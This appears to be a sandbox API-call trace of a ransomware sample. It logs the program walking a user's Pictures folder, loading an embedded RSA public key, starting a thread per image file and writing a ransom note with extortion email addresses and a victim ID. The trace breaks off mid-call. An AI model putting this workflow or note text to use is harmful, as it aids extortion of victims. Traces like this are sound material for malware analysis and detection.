[0126.319] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x608 [0126.320] Sleep (dwMilliseconds=0x96) [0126.474] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0126.474] lstrcmpW (lpString1="VUaHmntzHPrBw9rs6O1.jpg", lpString2="..") returned 1 [0126.474] lstrcmpW (lpString1="VUaHmntzHPrBw9rs6O1.jpg", lpString2=".") returned 1 [0126.475] StrStrW (lpFirst="VUaHmntzHPrBw9rs6O1.jpg", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0126.475] StrStrW (lpFirst="VUaHmntzHPrBw9rs6O1.jpg", lpSrch="ntldr") returned 0x0 [0126.475] StrStrW (lpFirst="VUaHmntzHPrBw9rs6O1.jpg", lpSrch="NTLDR") returned 0x0 [0126.475] StrStrW (lpFirst="VUaHmntzHPrBw9rs6O1.jpg", lpSrch="NTDETECT.COM") returned 0x0 [0126.475] StrStrW (lpFirst="VUaHmntzHPrBw9rs6O1.jpg", lpSrch="ntdetect.com") returned 0x0 [0126.475] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0126.475] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0126.475] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0126.475] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0126.475] lstrcpyW (in: lpString1=0x17cf1c, lpString2="VUaHmntzHPrBw9rs6O1.jpg" | out: lpString1="VUaHmntzHPrBw9rs6O1.jpg") returned="VUaHmntzHPrBw9rs6O1.jpg" [0126.475] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0126.475] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x60c [0126.475] Sleep (dwMilliseconds=0x96) [0126.662] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0126.662] lstrcmpW (lpString1="wbMFjBguMLJG3mRfnnUn.bmp", lpString2="..") returned 1 [0126.662] lstrcmpW (lpString1="wbMFjBguMLJG3mRfnnUn.bmp", lpString2=".") returned 1 [0126.662] StrStrW (lpFirst="wbMFjBguMLJG3mRfnnUn.bmp", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0126.662] StrStrW (lpFirst="wbMFjBguMLJG3mRfnnUn.bmp", lpSrch="ntldr") returned 0x0 [0126.662] StrStrW (lpFirst="wbMFjBguMLJG3mRfnnUn.bmp", lpSrch="NTLDR") returned 0x0 [0126.662] StrStrW (lpFirst="wbMFjBguMLJG3mRfnnUn.bmp", lpSrch="NTDETECT.COM") returned 0x0 [0126.662] StrStrW (lpFirst="wbMFjBguMLJG3mRfnnUn.bmp", lpSrch="ntdetect.com") returned 0x0 [0126.662] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0126.662] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0126.662] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0126.662] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0126.662] lstrcpyW (in: lpString1=0x17cf1c, lpString2="wbMFjBguMLJG3mRfnnUn.bmp" | out: lpString1="wbMFjBguMLJG3mRfnnUn.bmp") returned="wbMFjBguMLJG3mRfnnUn.bmp" [0126.662] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0126.662] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x614 [0126.662] Sleep (dwMilliseconds=0x96) [0126.834] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0126.834] lstrcmpW (lpString1="XL uwZp2bbBe4jnmB.png", lpString2="..") returned 1 [0126.834] lstrcmpW (lpString1="XL uwZp2bbBe4jnmB.png", lpString2=".") returned 1 [0126.834] StrStrW (lpFirst="XL uwZp2bbBe4jnmB.png", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0126.834] StrStrW (lpFirst="XL uwZp2bbBe4jnmB.png", lpSrch="ntldr") returned 0x0 [0126.834] StrStrW (lpFirst="XL uwZp2bbBe4jnmB.png", lpSrch="NTLDR") returned 0x0 [0126.834] StrStrW (lpFirst="XL uwZp2bbBe4jnmB.png", lpSrch="NTDETECT.COM") returned 0x0 [0126.834] StrStrW (lpFirst="XL uwZp2bbBe4jnmB.png", lpSrch="ntdetect.com") returned 0x0 [0126.834] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0126.834] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0126.834] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0126.834] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0126.834] lstrcpyW (in: lpString1=0x17cf1c, lpString2="XL uwZp2bbBe4jnmB.png" | out: lpString1="XL uwZp2bbBe4jnmB.png") returned="XL uwZp2bbBe4jnmB.png" [0126.834] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0126.834] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x620 [0126.834] Sleep (dwMilliseconds=0x96) [0127.020] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.020] lstrcmpW (lpString1="y5Mqnfp y9ox7lXm62.png", lpString2="..") returned 1 [0127.020] lstrcmpW (lpString1="y5Mqnfp y9ox7lXm62.png", lpString2=".") returned 1 [0127.020] StrStrW (lpFirst="y5Mqnfp y9ox7lXm62.png", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0127.020] StrStrW (lpFirst="y5Mqnfp y9ox7lXm62.png", lpSrch="ntldr") returned 0x0 [0127.021] StrStrW (lpFirst="y5Mqnfp y9ox7lXm62.png", lpSrch="NTLDR") returned 0x0 [0127.021] StrStrW (lpFirst="y5Mqnfp y9ox7lXm62.png", lpSrch="NTDETECT.COM") returned 0x0 [0127.021] StrStrW (lpFirst="y5Mqnfp y9ox7lXm62.png", lpSrch="ntdetect.com") returned 0x0 [0127.021] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0127.021] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0127.021] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0127.021] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0127.021] lstrcpyW (in: lpString1=0x17cf1c, lpString2="y5Mqnfp y9ox7lXm62.png" | out: lpString1="y5Mqnfp y9ox7lXm62.png") returned="y5Mqnfp y9ox7lXm62.png" [0127.021] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0127.021] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x624 [0127.021] WaitForSingleObject (hHandle=0x624, dwMilliseconds=0xffffffff) returned 0x0 [0127.173] Sleep (dwMilliseconds=0x96) [0127.317] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.317] lstrcmpW (lpString1="Yj-AfpoJM9u50s86.png", lpString2="..") returned 1 [0127.317] lstrcmpW (lpString1="Yj-AfpoJM9u50s86.png", lpString2=".") returned 1 [0127.317] StrStrW (lpFirst="Yj-AfpoJM9u50s86.png", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0127.317] StrStrW (lpFirst="Yj-AfpoJM9u50s86.png", lpSrch="ntldr") returned 0x0 [0127.317] StrStrW (lpFirst="Yj-AfpoJM9u50s86.png", lpSrch="NTLDR") returned 0x0 [0127.317] StrStrW (lpFirst="Yj-AfpoJM9u50s86.png", lpSrch="NTDETECT.COM") returned 0x0 [0127.317] StrStrW (lpFirst="Yj-AfpoJM9u50s86.png", lpSrch="ntdetect.com") returned 0x0 [0127.317] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0127.317] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0127.317] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0127.317] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0127.317] lstrcpyW (in: lpString1=0x17cf1c, lpString2="Yj-AfpoJM9u50s86.png" | out: lpString1="Yj-AfpoJM9u50s86.png") returned="Yj-AfpoJM9u50s86.png" [0127.317] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0127.317] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x618 [0127.317] Sleep (dwMilliseconds=0x96) [0127.504] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.504] lstrcmpW (lpString1="ylARzGL.png", lpString2="..") returned 1 [0127.504] lstrcmpW (lpString1="ylARzGL.png", lpString2=".") returned 1 [0127.504] StrStrW (lpFirst="ylARzGL.png", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0127.504] StrStrW (lpFirst="ylARzGL.png", lpSrch="ntldr") returned 0x0 [0127.504] StrStrW (lpFirst="ylARzGL.png", lpSrch="NTLDR") returned 0x0 [0127.504] StrStrW (lpFirst="ylARzGL.png", lpSrch="NTDETECT.COM") returned 0x0 [0127.504] StrStrW (lpFirst="ylARzGL.png", lpSrch="ntdetect.com") returned 0x0 [0127.504] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0127.504] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0127.504] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 43 [0127.504] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0127.504] lstrcpyW (in: lpString1=0x17cf1c, lpString2="ylARzGL.png" | out: lpString1="ylARzGL.png") returned="ylARzGL.png" [0127.504] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0127.504] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x61c [0127.505] Sleep (dwMilliseconds=0x96) [0127.661] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.661] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0127.661] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0127.661] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0127.661] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0127.661] FindClose (in: hFindFile=0x3a55d0 | out: hFindFile=0x3a55d0) returned 1 [0127.661] FindClose (in: hFindFile=0x3a55d0 | out: hFindFile=0x3a55d0) returned 0 [0127.661] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" [0127.661] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*" [0127.661] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="Desktop") returned 0x0 [0127.661] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpSrch="DESKTOP") returned 0x0 [0127.661] SetErrorMode (uMode=0x1) returned 0x1 [0127.662] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_HELP_INSTRUCTION.TXT") returned 60 [0127.662] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0127.662] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0127.662] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x610) returned 0x0 [0127.662] RegQueryValueExW (in: hKey=0x610, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cbca20, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3cbca20*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0127.662] RegCloseKey (hKey=0x610) returned 0x0 [0127.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0127.662] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0127.662] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x610 [0127.662] CloseHandle (hObject=0x610) returned 1 [0127.663] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3a55d0 [0127.663] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned="Pictures" [0127.663] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Pictures" | out: lpString1="Pictures") returned="Pictures" [0127.663] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0127.663] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0127.663] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.663] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0127.663] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.663] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.663] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.663] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.663] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.663] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.663] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.663] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.663] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.663] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.663] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.663] FindNextFileW (in: hFindFile=0x3a55d0, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0127.664] FindNextFileW (in: 